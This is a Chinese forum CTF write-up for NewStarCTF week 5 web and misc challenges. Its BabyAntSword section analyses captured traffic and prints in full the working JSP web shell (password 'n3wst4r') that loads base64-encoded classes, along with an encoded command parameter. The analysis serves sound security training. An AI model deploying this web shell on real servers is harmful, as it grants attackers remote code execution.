NewStarCTF第五周web和misc赛题

sbhglqy   ·   发表于 2023-11-07 10:19:47   ·   CTF&WP专版

一、隐秘的图片

给出了两张图片,像是二维码,但是其中一张图片是损坏的,因此想到使用Stegsolve对两张图片进行异或:







异或得到一张新的二维码,扫描获得Flag:



二、ezhard

拿到文件之后发现是硬盘格式文件



新建目录 挂载



flag在hint.png

三、新建Python文件

pyc文件隐写很容易就能找到stegosaurus项目:https://github.com/AngelKitty/stegosaurus

需要注意的是这个项目对于环境要求比较离谱,尽量用Python3.6去运行

直接提取隐写数据即可:

  1. python3 stegosaurus/stegosaurus.py -x flag.pyc

四、BabyAntSword

题目要求如下



首先过滤出POST方式的请求:

  1. http.request.method == POST

发现有一个文件上传的请求:





上传了一个shell.war文件,这里应该可以看出来其实是tomcat弱口令部署war包GetShell的一个流量。

保存下来war包解压:

  1. jar -xvf download.war

可以获得yesec.jsp:

  1. <%!
  2. class U extends ClassLoader {
  3. U(ClassLoader c) {
  4. super(c);
  5. }
  6. public Class g(byte[] b) {
  7. return super.defineClass(b, 0, b.length);
  8. }
  9. }
  10. public byte[] base64Decode(String str) throws Exception {
  11. try {
  12. Class clazz = Class.forName("sun.misc.BASE64Decoder");
  13. return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
  14. } catch (Exception e) {
  15. Class clazz = Class.forName("java.util.Base64");
  16. Object decoder = clazz.getMethod("getDecoder").invoke(null);
  17. return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
  18. }
  19. }
  20. %>
  21. <%
  22. String cls = request.getParameter("n3wst4r");
  23. if (cls != null) {
  24. new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
  25. }
  26. %>

由此得到WebShell密码:n3wst4r

这个密码也可以从后续的请求包中得到:



对于蚁剑响应流量的解密就是Base64解密即可,需要去掉响应首尾拼接的干扰字符。

对于蚁剑请求流量的分析需要删掉首部前两个字符,例如在tcp.stream eq 39的请求中我们提取出参数:

  1. f6f75679ab3efc=AvY2QgIi91c3IvbG9jYWwvdG9tY2F0IjtlbnY7ZWNobyBmNWNkOTtwd2Q7ZWNobyAwYTI1ZmJjMWM1

去掉参数值的前两位得到:

  1. Y2QgIi91c3IvbG9jYWwvdG9tY2F0IjtlbnY7ZWNobyBmNWNkOTtwd2Q7ZWNobyAwYTI1ZmJjMWM1

Base64解码后得到:

更多内容已被隐藏
主题内容你需要付费可见 (点击购买) 售价:1 金币
用户名金币积分时间理由
Track-魔方 100.00 0 2023-11-13 20:08:13 一个受益终生的帖子~~

打赏我,让我更有动力~

附件列表

1.zip   文件大小:5.616M (下载次数:5)

7 条回复   |  直到 2个月前 | 400 次浏览

zzzazzz
发表于 2023-11-14

1

评论列表

  • 加载数据中...

编写评论内容

jacker778
发表于 2023-11-15

1

评论列表

  • 加载数据中...

编写评论内容

a63560171
发表于 2023-11-25

1

评论列表

  • 加载数据中...

编写评论内容

董柯岩
发表于 2023-11-28

1

评论列表

  • 加载数据中...

编写评论内容

asukaa
发表于 11个月前

1

评论列表

  • 加载数据中...

编写评论内容

asukaa
发表于 10个月前

1

评论列表

  • 加载数据中...

编写评论内容

fupanc
发表于 2个月前

瑞思拜

评论列表

  • 加载数据中...

编写评论内容
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.